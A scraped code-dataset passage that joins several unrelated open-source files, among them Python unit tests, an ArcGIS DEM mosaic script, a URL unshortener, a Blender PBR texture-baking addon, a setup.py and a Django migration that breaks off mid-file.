| bsd-2-clause | 2,655,987,242,932,133,000 | 35.895833 | 79 | 0.620553 | false | 4.043379 | false | false | false |
rockyzhang/workload-automation | wlauto/tests/test_extension.py | 1 | 7254 | # Copyright 2014-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pylint: disable=E0611,R0201,E1101
from unittest import TestCase
from nose.tools import assert_equal, raises, assert_true
from wlauto.core.extension import Extension, Parameter, Param, ExtensionMeta, Module
from wlauto.utils.types import list_of_ints
from wlauto.exceptions import ConfigError
class MyMeta(ExtensionMeta):
virtual_methods = ['validate', 'virtual1', 'virtual2']
class MyBaseExtension(Extension):
__metaclass__ = MyMeta
name = 'base'
parameters = [
Parameter('base'),
]
def __init__(self, **kwargs):
super(MyBaseExtension, self).__init__(**kwargs)
self.v1 = 0
self.v2 = 0
self.v3 = ''
def virtual1(self):
self.v1 += 1
self.v3 = 'base'
def virtual2(self):
self.v2 += 1
class MyAcidExtension(MyBaseExtension):
name = 'acid'
parameters = [
Parameter('hydrochloric', kind=list_of_ints, default=[1, 2]),
'citric',
('carbonic', int),
]
def __init__(self, **kwargs):
super(MyAcidExtension, self).__init__(**kwargs)
self.vv1 = 0
self.vv2 = 0
def virtual1(self):
self.vv1 += 1
self.v3 = 'acid'
def virtual2(self):
self.vv2 += 1
class MyOtherExtension(MyBaseExtension):
name = 'other'
parameters = [
Param('mandatory', mandatory=True),
Param('optional', allowed_values=['test', 'check']),
]
class MyOtherOtherExtension(MyOtherExtension):
name = 'otherother'
parameters = [
Param('mandatory', override=True),
]
class MyOverridingExtension(MyAcidExtension):
name = 'overriding'
parameters = [
Parameter('hydrochloric', override=True, default=[3, 4]),
]
class MyThirdTeerExtension(MyOverridingExtension):
name = 'thirdteer'
class MultiValueParamExt(Extension):
name = 'multivalue'
parameters = [
Parameter('test', kind=list_of_ints, allowed_values=[42, 7, 73]),
]
class MyCoolModule(Module):
name = 'cool_module'
capabilities = ['fizzle']
def initialize(self):
self.fizzle_factor = 0 # pylint: disable=attribute-defined-outside-init
def fizzle(self):
self.fizzle_factor += 1
class MyEvenCoolerModule(Module):
name = 'even_cooler_module'
capabilities = ['fizzle']
def fizzle(self):
self.owner.self_fizzle_factor += 2
class MyModularExtension(Extension):
name = 'modular'
parameters = [
Parameter('modules', override=True, default=['cool_module']),
]
class MyOtherModularExtension(Extension):
name = 'other_modular'
parameters = [
Parameter('modules', override=True, default=[
'cool_module',
'even_cooler_module',
]),
]
def __init__(self, **kwargs):
super(MyOtherModularExtension, self).__init__(**kwargs)
self.self_fizzle_factor = 0
class FakeLoader(object):
modules = [
MyCoolModule,
MyEvenCoolerModule,
]
def get_module(self, name, owner, **kwargs): # pylint: disable=unused-argument
for module in self.modules:
if module.name == name:
return _instantiate(module, owner)
class ExtensionMetaTest(TestCase):
def test_propagation(self):
acid_params = [p.name for p in MyAcidExtension.parameters]
assert_equal(acid_params, ['modules', 'base', 'hydrochloric', 'citric', 'carbonic'])
@raises(ValueError)
def test_duplicate_param_spec(self):
class BadExtension(MyBaseExtension): # pylint: disable=W0612
parameters = [
Parameter('base'),
]
def test_param_override(self):
class OverridingExtension(MyBaseExtension): # pylint: disable=W0612
parameters = [
Parameter('base', override=True, default='cheese'),
]
assert_equal(OverridingExtension.parameters['base'].default, 'cheese')
@raises(ValueError)
def test_invalid_param_spec(self):
class BadExtension(MyBaseExtension): # pylint: disable=W0612
parameters = [
7,
]
def test_virtual_methods(self):
acid = _instantiate(MyAcidExtension)
acid.virtual1()
assert_equal(acid.v1, 1)
assert_equal(acid.vv1, 1)
assert_equal(acid.v2, 0)
assert_equal(acid.vv2, 0)
assert_equal(acid.v3, 'acid')
acid.virtual2()
acid.virtual2()
assert_equal(acid.v1, 1)
assert_equal(acid.vv1, 1)
assert_equal(acid.v2, 2)
assert_equal(acid.vv2, 2)
class ParametersTest(TestCase):
def test_setting(self):
myext = _instantiate(MyAcidExtension, hydrochloric=[5, 6], citric=5, carbonic=42)
assert_equal(myext.hydrochloric, [5, 6])
assert_equal(myext.citric, '5')
assert_equal(myext.carbonic, 42)
def test_validation_ok(self):
myext = _instantiate(MyOtherExtension, mandatory='check', optional='check')
myext.validate()
def test_default_override(self):
myext = _instantiate(MyOverridingExtension)
assert_equal(myext.hydrochloric, [3, 4])
myotherext = _instantiate(MyThirdTeerExtension)
assert_equal(myotherext.hydrochloric, [3, 4])
def test_multivalue_param(self):
myext = _instantiate(MultiValueParamExt, test=[7, 42])
myext.validate()
assert_equal(myext.test, [7, 42])
@raises(ConfigError)
def test_bad_multivalue_param(self):
myext = _instantiate(MultiValueParamExt, test=[5])
myext.validate()
@raises(ConfigError)
def test_validation_no_mandatory(self):
myext = _instantiate(MyOtherExtension, optional='check')
myext.validate()
@raises(ConfigError)
def test_validation_no_mandatory_in_derived(self):
_instantiate(MyOtherOtherExtension)
@raises(ConfigError)
def test_validation_bad_value(self):
myext = _instantiate(MyOtherExtension, mandatory=1, optional='invalid')
myext.validate()
class ModuleTest(TestCase):
def test_fizzle(self):
myext = _instantiate(MyModularExtension)
myext.load_modules(FakeLoader())
assert_true(myext.can('fizzle'))
myext.fizzle()
assert_equal(myext.fizzle_factor, 1)
def test_self_fizzle(self):
myext = _instantiate(MyOtherModularExtension)
myext.load_modules(FakeLoader())
myext.fizzle()
assert_equal(myext.self_fizzle_factor, 2)
def _instantiate(cls, *args, **kwargs):
# Needed to get around Extension's __init__ checks
return cls(*args, **kwargs)
| apache-2.0 | 7,303,976,956,362,171,000 | 24.363636 | 92 | 0.630824 | false | 3.605368 | true | false | false |
Cadasta/cadasta-platform | cadasta/search/tests/test_urls_async.py | 1 | 1424 | from django.test import TestCase
from django.core.urlresolvers import reverse, resolve
from ..views import async
class SearchUrlTest(TestCase):
def test_search(self):
actual = reverse('async:search:search',
kwargs={
'organization': 'habitat',
'project': '123',
})
expected = '/async/organizations/habitat/projects/123/search/'
assert actual == expected
resolved = resolve(
'/async/organizations/habitat/projects/123/search/')
assert resolved.func.__name__ == async.Search.__name__
assert resolved.kwargs['organization'] == 'habitat'
assert resolved.kwargs['project'] == '123'
# def test_search_export(self):
# actual = reverse('async:search:export',
# kwargs={
# 'organization': 'habitat',
# 'project': '123',
# })
# expected = '/async/organizations/habitat/projects/123/search/export/'
# assert actual == expected
# resolved = resolve(
# '/async/organizations/habitat/projects/123/search/export/')
# assert resolved.func.__name__ == async.SearchExport.__name__
# assert resolved.kwargs['organization'] == 'habitat'
# assert resolved.kwargs['project'] == '123'
| agpl-3.0 | 3,628,609,514,204,241,000 | 37.486486 | 79 | 0.543539 | false | 4.45 | true | false | false |
stuporglue/solar_scripts | dems2mosaic.py | 1 | 2191 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Create a Mosaic Dataset in the workspace and add all
# *.img rasters from the input directory
#
# python dems2mosaic.py "C:\workspace\dems" "C:\workspace" "26915.prj"
import arcpy,sys,os
from config import *
from distutils.spawn import *
from arcpy import *
################ Usage check and argument assigning
if len(sys.argv) != 4:
print "Usage: build_mosaic.py <input directory> <workspace/output dir> <.prj file>"
print "The input directory should have the img rasters in it"
print "Contents in the output directory will be overwritten"
exit(-1)
else:
inpath = config.get('paths','dem_output_dir')
workspacedir = config.get('arcgis','workspace')
prjfile = config.get('projection','prj_file')
arcpy.env.workspace = workspacedir
gdbname = config.get('arcgis','dem_mosaic_name')
# Create a File GeoDatabase to house the Mosaic dataset
arcpy.CreateFileGDB_management(workspacedir, gdbname)
# Create Mosaic Dataset
# http://resources.arcgis.com/en/help/main/10.2/index.html#//00170000008n000000
mdname = "DEM_MOSAIC"
noband = "1"
pixtype = "32_BIT_FLOAT"
pdef = "NONE"
wavelength = ""
arcpy.CreateMosaicDataset_management(gdbname, mdname, prjfile, noband, pixtype, pdef, wavelength)
# Add rasters to Mosaic Dataset
# http://resources.arcgis.com/en/help/main/10.2/index.html#//001700000085000000
mdname = gdbname + "/" + mdname
rastype = "ERDAS IMAGINE" # http://resources.arcgis.com/en/help/main/10.2/index.html#//009t0000000v000000
updatecs = "NO_CELL_SIZES"
updatebnd = "NO_BOUNDARY"
updateovr = "UPDATE_OVERVIEWS"
maxlevel = "0" # pyramid level
maxcs = ""
maxdim = ""
spatialref = ""
inputdatafilter = "*.img"
subfolder = "NO_SUBFOLDERS"
duplicate = "EXCLUDE_DUPLICATES"
buildpy = "NO_PYRAMIDS"
calcstats = "NO_STATISTICS" # CALCULATE_STATISTICS
buildthumb = "NO_THUMBNAILS"
comments = "Add Raster Datasets"
forcesr = "NO_FORCE_SPATIAL_REFERENCE"
arcpy.AddRastersToMosaicDataset_management(
mdname, rastype, inpath, updatecs, updatebnd, updateovr,
maxlevel, maxcs, maxdim, spatialref, inputdatafilter,
subfolder, duplicate, buildpy, calcstats,
buildthumb, comments, forcesr)
| gpl-2.0 | -110,512,337,708,578,380 | 30.753623 | 106 | 0.724783 | false | 2.913564 | false | false | false |
skevas/unshorten | isurlshortener/unshortener.py | 1 | 3295 | # -*- coding: utf-8 -*-
"""Unshortener Documentation
This module unshortens URLs
"""
import re
import http
from urllib.parse import urlparse
from http import client
from isurlshortener.exceptions import PathMissing, UnhandledHTTPStatusCode, LocationHeaderMissing, ProtocolException
class Unshortener(object):
#FIXME: Most servers redirect http to https --> special handling for that?
@staticmethod
def unshorten_url(url: str) -> str:
"""Tries to unshorten an URL by requesting it and checking HTTP status
Args:
url: URL to check. The url MUST contain a protocol (e.g., http://), a domain (e.g., example.net), and a path
(e.g., something/) --> http://example.net/something/
Returns:
Unshortened URL
Raises:
IsUrlShortener.LocationHeaderMissing: Server did not return a Location
IsUrlShortener.UnhandledHTTPStatusCode: Unsupported HTTP status code
"""
url = Unshortener._prepare_url(url)
if url.path is '' or url.path is '/':
raise PathMissing()
server_connection = Unshortener._get_connection(url)
server_connection.request('GET', url.path)
response = server_connection.getresponse()
if response.status in range(300, 309):
return Unshortener._get_location_from_header(response.getheaders())
elif response.status in range(200, 201):
return url.geturl()
else:
raise UnhandledHTTPStatusCode(response.status)
@staticmethod
def _get_location_from_header(headers: list) -> str:
"""Returns the location information from the headers
Args:
headers: Header returned from the server
Returns:
Location information
Raises:
IsUrlShortener.LocationHeaderMissing: Location field missing in the header
"""
for header_field in headers:
if header_field[0].lower() == 'location':
return header_field[1]
raise LocationHeaderMissing
@staticmethod
def _prepare_url(url: str) -> dict:
"""Prepares a given URL strict for the unshortener
Args:
url: URL prepare
Returns:
Dict with the prepared URL information
Raises:
IsUrlShortener.ProtocolException: http/https protocol prefix is missing
"""
if not re.findall('^(http[s]?://)', url):
raise ProtocolException('Invalid protocol or no protocol given')
return urlparse(url)
@staticmethod
def _get_connection(url: dict) -> [http.client.HTTPConnection, http.client.HTTPSConnection]:
"""Prepares a connection to a given server
Args:
url: URL with server information
Returns:
Connection to the server
Raises:
IsUrlShortener.ProtocolException: Protocol not supported
"""
if url.scheme == 'http':
return http.client.HTTPConnection(url.netloc)
elif url.scheme == 'https':
return http.client.HTTPSConnection(url.netloc)
else:
raise ProtocolException('Protocol Exception: "{}"'.format(url.scheme))
| mit | -8,120,319,903,030,770,000 | 31.95 | 120 | 0.617906 | false | 4.601955 | false | false | false |
gnovis/swift | swift_fca/swift_core/interval_fca.py | 1 | 1073 | from math import isinf
class Interval:
def __init__(self, val_from, val_to):
self._val_from = float(val_from)
self._val_to = float(val_to)
def __contains__(self, value):
return bool(self._val_from <= float(value) <= self._val_to)
def __str__(self):
return "{}-{}".format(self._val_from, self._val_to)
def is_open(self):
return bool(isinf(self._val_to))
class Intervals:
def __init__(self, intervals):
self._open_intervals = []
self._closed_intervals = []
for i in intervals:
if i.is_open():
self._open_intervals.append(i)
else:
self._closed_intervals.append(i)
def val_in_open_interval(self, value):
return self.val_in(self._open_intervals, value)
def val_in_closed_interval(self, value):
return self.val_in(self._closed_intervals, value)
def val_in(self, intervals, value):
for interval in intervals:
if value in interval:
return True
return False
| gpl-3.0 | -8,449,861,179,838,928,000 | 25.170732 | 67 | 0.564772 | false | 3.725694 | false | false | false |
oscurart/BlenderAddons | oscurart_bake_pbr_maps_linear.py | 1 | 13463 | import bpy
import os
def setSceneOpts():
global channels
global sizex
global sizey
global selected_to_active
# VARIABLES
sizex = bpy.context.scene.bake_pbr_channels.sizex
sizey = bpy.context.scene.bake_pbr_channels.sizey
selected_to_active= bpy.context.scene.bake_pbr_channels.seltoact
channels = {"metallic":["ME","GLOSSY"],
"occlusion":["AO","AO"],
"normal":["NM","NORMAL"],
"emit":["EM","EMIT"],
"roughness":["RO","ROUGHNESS"],
"opacity":["OP","TRANSMISSION"],
"albedo":["AT","DIFFUSE"]}
bpy.context.scene.render.image_settings.file_format = "OPEN_EXR"
bpy.context.scene.render.image_settings.color_mode = "RGBA"
bpy.context.scene.render.image_settings.exr_codec = "ZIP"
bpy.context.scene.render.image_settings.color_depth = "16"
#set bake options
bpy.context.scene.render.bake_type = "TEXTURE"
bpy.context.scene.render.bake.use_pass_direct = 0
bpy.context.scene.render.bake.use_pass_indirect = 0
bpy.context.scene.render.bake.use_pass_color = 1
bpy.context.scene.render.bake.use_selected_to_active = selected_to_active
#__________________________________________________________________________________
def mergeObjects():
global selectedObjects
global object
global selObject
#agrupo los seleccionados y el activo
object = bpy.context.active_object
selectedObjects = bpy.context.selected_objects[:].copy()
selectedObjects.remove(bpy.context.active_object)
# si es selected to active hago un merge de los objetos restantes
if selected_to_active:
bpy.ops.object.select_all(action="DESELECT")
for o in selectedObjects:
o.select = True
bpy.context.scene.objects.active = selectedObjects[0]
bpy.ops.object.convert(target="MESH", keep_original=True)
selObject = bpy.context.active_object
bpy.ops.object.join()
bpy.ops.object.transform_apply(location=True, rotation=True, scale=True, properties=True)
else:
selObject=bpy.context.active_object
#seteo el objeto activo
bpy.context.scene.objects.active = object
#__________________________________________________________________________________
def createTempMats():
global ms
global copyMats
global roughMats
global transMats
global glossyMats
#lista de materiales originales
if not selected_to_active:
ms = [mat.material for mat in object.material_slots]
else:
ms = [mat.material for mat in selObject.material_slots]
#sumo materiales copia y reemplazo slots
for matType in ["_glossyTemp","_copyTemp","_roughnessTemp","_trans"]:
ims = 0
for mat in ms:
mc = mat.copy()
mc.name = mat.name+matType
if not selected_to_active:
object.material_slots[ims].material = mc
else:
selObject.material_slots[ims].material = mc
ims += 1
copyMats = [mat for mat in bpy.data.materials if mat.name.endswith("_copyTemp")]
glossyMats = [mat for mat in bpy.data.materials if mat.name.endswith("_glossyTemp")]
roughMats = [mat for mat in bpy.data.materials if mat.name.endswith("_roughnessTemp")]
transMats = [mat for mat in bpy.data.materials if mat.name.endswith("_trans")]
#__________________________________________________________________________________
# mezcloGlossy
def mixGlossy(material):
mat = material
for node in mat.node_tree.nodes[:]:
if node.type == "BSDF_PRINCIPLED":
nprin = mat.node_tree.nodes.new("ShaderNodeBsdfPrincipled") # nuevo principled
mix = mat.node_tree.nodes.new("ShaderNodeMixShader")
mat.node_tree.links.new(mix.inputs[2],nprin.outputs[0])
mat.node_tree.links.new(mix.inputs[1],node.outputs[0])
if node.inputs["Metallic"].is_linked:
mat.node_tree.links.new(mix.inputs[0],node.inputs['Metallic'].links[0].from_socket)
else:
mix.inputs[0].default_value = node.inputs['Metallic'].default_value
#copio metalico
if node.inputs["Metallic"].is_linked:
mat.node_tree.links.new(mix.inputs[0],node.inputs["Metallic"].links[0].from_socket)
mat.node_tree.links.new(node.outputs['BSDF'].links[0].to_socket,mix.outputs[0])
#copio seteos de p a p
for entrada in ["Base Color","Roughness"]:
if node.inputs[entrada].is_linked:
mat.node_tree.links.new(nprin.inputs[entrada],node.inputs[entrada].links[0].from_socket)
nprin.inputs[entrada].default_value = node.inputs[entrada].default_value
node.inputs['Specular'].default_value = 0
node.inputs['Metallic'].default_value = 0 # ambos a cero
nprin.inputs['Specular'].default_value = 0
nprin.inputs['Metallic'].default_value = 1 # nuevo prin a 1
for link in mat.node_tree.links:
if link.to_socket.name == "Metallic":
mat.node_tree.links.remove(link)
#__________________________________________________________________________________
#desmetalizar
def desmetalizar(material):
for link in mat.node_tree.links:
if link.to_socket.name == "Metallic":
mat.node_tree.links.remove(link)
for matnode in mat.node_tree.nodes:
if matnode.type == "BSDF_PRINCIPLED":
# desconecto metallic y seteo cero
if matnode.inputs['Metallic'].is_linked:
matnode.inputs["Metallic"].default_value = 0
matnode.inputs["Specular"].default_value = 0
else:
matnode.inputs["Metallic"].default_value = 0
matnode.inputs['Specular'].default_value = 0
#destransparentizar
def destransparentizar(material):
for link in mat.node_tree.links:
if link.to_socket.name == "Transmission":
mat.node_tree.links.remove(link)
for matnode in mat.node_tree.nodes:
if matnode.type == "BSDF_PRINCIPLED":
# desconecto metallic y seteo cero
if matnode.inputs['Transmission'].is_linked:
matnode.inputs["Transmission"].default_value = 0
else:
matnode.inputs["Transmission"].default_value = 0
#saca todos los speculares
def desespecular(material):
for matnode in material.node_tree.nodes:
if matnode.type == "BSDF_PRINCIPLED":
matnode.inputs["Specular"].default_value = 0
#base color a 1
def baseColorA1(material):
for link in mat.node_tree.links:
if link.to_socket.name == "Base Color":
mat.node_tree.links.remove(link)
for node in mat.node_tree.nodes:
if node.type == "BSDF_PRINCIPLED":
node.inputs['Base Color'].default_value= (1,1,1,1)
#cambia slots
def cambiaSlots(objeto,sufijo):
for ms in objeto.material_slots:
ms.material = bpy.data.materials[ms.material.name.rpartition("_")[0]+sufijo]
#__________________________________________________________________________________
def removeMatProps():
global mat
#saco los metales en las copias de copy
for mat in copyMats:
desmetalizar(mat)
destransparentizar(mat)
#saco los metales en las copias de glossy
for mat in glossyMats:
desespecular(mat)
mixGlossy(mat)
destransparentizar(mat)
#llevo a uno los base color de roughness
for mat in roughMats:
desespecular(mat)
baseColorA1(mat)
destransparentizar(mat)
# saco metales para transmisiones
for mat in transMats:
desmetalizar(mat)
desespecular(mat)
baseColorA1(mat)
#__________________________________________________________________________________
def bake(map):
#crea imagen
imgpath = "%s/IMAGES" % (os.path.dirname(bpy.data.filepath))
img = bpy.data.images.new(channels[map][0], width=sizex, height=sizey, alpha=True,float_buffer=True)
print ("Render: %s" % (channels[map][1]))
img.colorspace_settings.name = 'Linear'
if not selected_to_active:
img.filepath = "%s/%s_%s.exr" % (imgpath, object.name, channels[map][0])
else:
img.filepath = "%s/%s_%s.exr" % (imgpath, object.active_material.name, channels[map][0])
#cambio materiales
if channels[map][0] == "ME":
cambiaSlots(selObject,"_glossyTemp")
if channels[map][0] == "RO":
cambiaSlots(selObject,"_roughnessTemp")
if channels[map][0] in ["AT","AO","NM","EM","OP"]:
cambiaSlots(selObject,"_copyTemp")
if channels[map][0] in ["OP"]:
cambiaSlots(selObject,"_trans")
# creo nodos y bakeo
if not selected_to_active:
for activeMat in selObject.data.materials: #aca estaba el mscopy
# seteo el nodo
node = activeMat.node_tree.nodes.new("ShaderNodeTexImage")
node.image = img
activeMat.node_tree.nodes.active = node
node.color_space = "NONE"
node.select = True
else:
activeMat = object.active_material
# seteo el nodo
node = activeMat.node_tree.nodes.new("ShaderNodeTexImage")
node.image = img
activeMat.node_tree.nodes.active = node
node.color_space = "NONE"
node.select = True
bpy.ops.object.bake(type=channels[map][1])
img.save_render(img.filepath)
bpy.data.images.remove(img)
print ("%s Done!" % (channels[map][1]))
#__________________________________________________________________________________
def executePbr():
#bakeo
setSceneOpts()
mergeObjects()
createTempMats()
removeMatProps()
for map in channels.keys():
if getattr(bpy.context.scene.bake_pbr_channels,map):
bake(map)
#restauro material slots
for matSlot,rms in zip(selObject.material_slots,ms):
matSlot.material = rms
#remuevo materiales copia
for ma in copyMats+glossyMats+roughMats+transMats:
bpy.data.materials.remove(ma)
#borro el merge
if selected_to_active:
bpy.data.objects.remove(selObject, do_unlink=True, do_id_user=True, do_ui_user=True)
class BakePbr (bpy.types.Operator):
"""Bake PBR materials"""
bl_idname = "object.bake_pbr_maps"
bl_label = "Bake PBR Maps"
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
executePbr()
return {'FINISHED'}
#__________________________________________________________________________________
class bakeChannels(bpy.types.PropertyGroup):
metallic = bpy.props.BoolProperty(name="Metallic",default=False)
occlusion = bpy.props.BoolProperty(name="Occlusion",default=False)
normal = bpy.props.BoolProperty(name="Normal",default=False)
emit = bpy.props.BoolProperty(name="Emit",default=False)
roughness = bpy.props.BoolProperty(name="Roughness",default=False)
opacity = bpy.props.BoolProperty(name="Opacity",default=False)
albedo = bpy.props.BoolProperty(name="Albedo",default=False)
sizex = bpy.props.IntProperty(name="Size x", default= 1024)
sizey = bpy.props.IntProperty(name="Size y", default= 1024)
seltoact = bpy.props.BoolProperty(name="Selected to active", default= True)
bpy.utils.register_class(bakeChannels)
class LayoutDemoPanel(bpy.types.Panel):
"""Creates a Panel in the scene context of the properties editor"""
bl_label = "Bake PBR"
bl_idname = "RENDER_PT_layout"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "render"
def draw(self, context):
layout = self.layout
scene = context.scene
# Create a simple row.
layout.label(text=" Channels:")
row = layout.row()
row.prop(scene.bake_pbr_channels, "metallic")
row = layout.row()
row.prop(scene.bake_pbr_channels, "occlusion")
row = layout.row()
row.prop(scene.bake_pbr_channels, "normal")
row = layout.row()
row.prop(scene.bake_pbr_channels, "emit")
row = layout.row()
row.prop(scene.bake_pbr_channels, "roughness")
row = layout.row()
row.prop(scene.bake_pbr_channels, "opacity")
row = layout.row()
row.prop(scene.bake_pbr_channels, "albedo")
row = layout.row()
row.prop(scene.bake_pbr_channels, "sizex")
row.prop(scene.bake_pbr_channels, "sizey")
row = layout.row()
row.prop(scene.bake_pbr_channels, "seltoact")
# Big render button
row = layout.row()
row.scale_y = 2
row.operator("object.bake_pbr_maps")
#__________________________________________________________________________________
bpy.types.Scene.bake_pbr_channels = bpy.props.PointerProperty(type=bakeChannels)
bpy.utils.register_class(LayoutDemoPanel)
bpy.utils.register_class(BakePbr) | gpl-2.0 | 6,051,950,876,114,977,000 | 35.193548 | 110 | 0.575578 | false | 3.5401 | false | false | false |
rcbops/opencenter-agent | setup.py | 1 | 2431 | #!/usr/bin/env python
# OpenCenter(TM) is Copyright 2013 by Rackspace US, Inc.
##############################################################################
#
# OpenCenter is licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. This
# version of OpenCenter includes Rackspace trademarks and logos, and in
# accordance with Section 6 of the License, the provision of commercial
# support services in conjunction with a version of OpenCenter which includes
# Rackspace trademarks and logos is prohibited. OpenCenter source code and
# details are available at: # https://github.com/rcbops/opencenter or upon
# written request.
#
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0 and a copy, including this
# notice, is available in the LICENSE file accompanying this software.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the # specific language governing permissions and limitations
# under the License.
#
##############################################################################
#
#
import os
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
def find_files(path_tuples):
output_array = []
for (path, destination) in path_tuples:
if os.path.isdir(path):
for d in os.walk(path):
if len(d[2]) != 0:
output_dir = d[0].replace(path, destination)
output_files = ["%s/%s" % (d[0], x) for x in d[2]]
output_array.append((output_dir, output_files))
else:
output_array.append((destination, [path]))
return output_array
setup(
name='opencenteragent',
version='0.1',
author='Rackspace US, Inc.',
description=('Yet another pluggable, modular host agent'),
license='Apache2',
url='https://github.com/rpedde/opencenter-agent',
long_description=read('README'),
packages=find_packages(),
data_files=find_files([['opencenteragent/plugins',
'share/opencenter-agent/plugins'],
['opencenter-agent.py', 'bin']])
)
| apache-2.0 | 8,020,559,618,043,347,000 | 36.984375 | 79 | 0.625257 | false | 4.134354 | false | false | false |
rdmorganiser/rdmo | rdmo/questions/migrations/0042_remove_null_true.py | 2 | 9265 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2019-03-13 11:54
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('questions', '0041_data_migration'),
]
operations = [
migrations.AlterField(
model_name='catalog',
name='comment',
field=models.TextField(blank=True, help_text='Additional internal information about this catalog.', verbose_name='Comment'),
),
migrations.AlterField(
model_name='catalog',
name='key',
field=models.SlugField(blank=True, help_text='The internal identifier of this catalog.', max_length=128, verbose_name='Key'),
),
migrations.AlterField(
model_name='catalog',
name='title_lang1',
field=models.CharField(blank=True, help_text='The title for this catalog in the primary language.', max_length=256, verbose_name='Title (primary)'),
),
migrations.AlterField(
model_name='catalog',
name='title_lang2',
field=models.CharField(blank=True, help_text='The title for this catalog in the secondary language.', max_length=256, verbose_name='Title (secondary)'),
),
migrations.AlterField(
model_name='catalog',
name='title_lang3',
field=models.CharField(blank=True, help_text='The title for this catalog in the tertiary language.', max_length=256, verbose_name='Title (tertiary)'),
),
migrations.AlterField(
model_name='catalog',
name='title_lang4',
field=models.CharField(blank=True, help_text='The title for this catalog in the quaternary language.', max_length=256, verbose_name='Title (quaternary)'),
),
migrations.AlterField(
model_name='catalog',
name='title_lang5',
field=models.CharField(blank=True, help_text='The title for this catalog in the quinary language.', max_length=256, verbose_name='Title (quinary)'),
),
migrations.AlterField(
model_name='catalog',
name='uri',
field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this catalog (auto-generated).', max_length=640, verbose_name='URI'),
),
migrations.AlterField(
model_name='catalog',
name='uri_prefix',
field=models.URLField(blank=True, help_text='The prefix for the URI of this catalog.', max_length=256, verbose_name='URI Prefix'),
),
migrations.AlterField(
model_name='questionset',
name='comment',
field=models.TextField(blank=True, help_text='Additional internal information about this questionset.', verbose_name='Comment'),
),
migrations.AlterField(
model_name='questionset',
name='help_lang1',
field=models.TextField(blank=True, help_text='The help text for this questionset in the primary language.', verbose_name='Help (primary)'),
),
migrations.AlterField(
model_name='questionset',
name='help_lang2',
field=models.TextField(blank=True, help_text='The help text for this questionset in the secondary language.', verbose_name='Help (secondary)'),
),
migrations.AlterField(
model_name='questionset',
name='help_lang3',
field=models.TextField(blank=True, help_text='The help text for this questionset in the tertiary language.', verbose_name='Help (tertiary)'),
),
migrations.AlterField(
model_name='questionset',
name='help_lang4',
field=models.TextField(blank=True, help_text='The help text for this questionset in the quaternary language.', verbose_name='Help (quaternary)'),
),
migrations.AlterField(
model_name='questionset',
name='help_lang5',
field=models.TextField(blank=True, help_text='The help text for this questionset in the quinary language.', verbose_name='Help (quinary)'),
),
migrations.AlterField(
model_name='questionset',
name='key',
field=models.SlugField(blank=True, help_text='The internal identifier of this questionset.', max_length=128, verbose_name='Key'),
),
migrations.AlterField(
model_name='questionset',
name='path',
field=models.CharField(blank=True, help_text='The path part of the URI of this questionset (auto-generated).', max_length=512, verbose_name='Path'),
),
migrations.AlterField(
model_name='questionset',
name='title_lang1',
field=models.CharField(blank=True, help_text='The title for this questionset in the primary language.', max_length=256, verbose_name='Title (primary)'),
),
migrations.AlterField(
model_name='questionset',
name='title_lang2',
field=models.CharField(blank=True, help_text='The title for this questionset in the secondary language.', max_length=256, verbose_name='Title (secondary)'),
),
migrations.AlterField(
model_name='questionset',
name='title_lang3',
field=models.CharField(blank=True, help_text='The title for this questionset in the tertiary language.', max_length=256, verbose_name='Title (tertiary)'),
),
migrations.AlterField(
model_name='questionset',
name='title_lang4',
field=models.CharField(blank=True, help_text='The title for this questionset in the quaternary language.', max_length=256, verbose_name='Title (quaternary)'),
),
migrations.AlterField(
model_name='questionset',
name='title_lang5',
field=models.CharField(blank=True, help_text='The title for this questionset in the quinary language.', max_length=256, verbose_name='Title (quinary)'),
),
migrations.AlterField(
model_name='questionset',
name='uri',
field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this questionset (auto-generated).', max_length=640, verbose_name='URI'),
),
migrations.AlterField(
model_name='questionset',
name='uri_prefix',
field=models.URLField(blank=True, help_text='The prefix for the URI of this questionset.', max_length=256, verbose_name='URI Prefix'),
),
migrations.AlterField(
model_name='section',
name='comment',
field=models.TextField(blank=True, help_text='Additional internal information about this section.', verbose_name='Comment'),
),
migrations.AlterField(
model_name='section',
name='key',
field=models.SlugField(blank=True, help_text='The internal identifier of this section.', max_length=128, verbose_name='Key'),
),
migrations.AlterField(
model_name='section',
name='path',
field=models.CharField(blank=True, help_text='The path part of the URI of this section (auto-generated).', max_length=512, verbose_name='Label'),
),
migrations.AlterField(
model_name='section',
name='title_lang1',
field=models.CharField(blank=True, help_text='The title for this section in the primary language.', max_length=256, verbose_name='Title (primary)'),
),
migrations.AlterField(
model_name='section',
name='title_lang2',
field=models.CharField(blank=True, help_text='The title for this section in the secondary language.', max_length=256, verbose_name='Title (secondary)'),
),
migrations.AlterField(
model_name='section',
name='title_lang3',
field=models.CharField(blank=True, help_text='The title for this section in the tertiary language.', max_length=256, verbose_name='Title (tertiary)'),
),
migrations.AlterField(
model_name='section',
name='title_lang4',
field=models.CharField(blank=True, help_text='The title for this section in the quaternary language.', max_length=256, verbose_name='Title (quaternary)'),
),
migrations.AlterField(
model_name='section',
name='title_lang5',
field=models.CharField(blank=True, help_text='The title for this section in the quinary language.', max_length=256, verbose_name='Title (quinary)'),
),
migrations.AlterField(
model_name='section',
name='uri',
field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this section (auto-generated).', max_length=640, verbose_name='URI'),
),
migrations.AlterField(
model_name='section',
name='uri_prefix',
